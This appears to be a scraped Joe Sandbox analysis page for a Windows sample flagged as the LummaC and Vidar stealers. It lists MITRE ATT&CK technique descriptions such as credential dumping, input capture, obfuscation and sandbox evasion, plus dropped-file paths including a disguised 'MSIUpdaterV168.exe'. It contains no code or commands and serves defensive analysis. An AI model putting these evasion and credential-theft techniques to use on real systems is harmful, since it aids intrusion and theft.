Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zyJWi2vy29.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\KFCGDBAKKKFB\AAFHII

C:\ProgramData\KFCGDBAKKKFB\AFCFHD

C:\ProgramData\KFCGDBAKKKFB\BAFCGI

C:\ProgramData\KFCGDBAKKKFB\CAAEBK

C:\ProgramData\KFCGDBAKKKFB\DBKKKE

C:\ProgramData\KFCGDBAKKKFB\DGHIEC

C:\ProgramData\KFCGDBAKKKFB\IJEHID

C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe

Windows Analysis Report
zyJWi2vy29.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre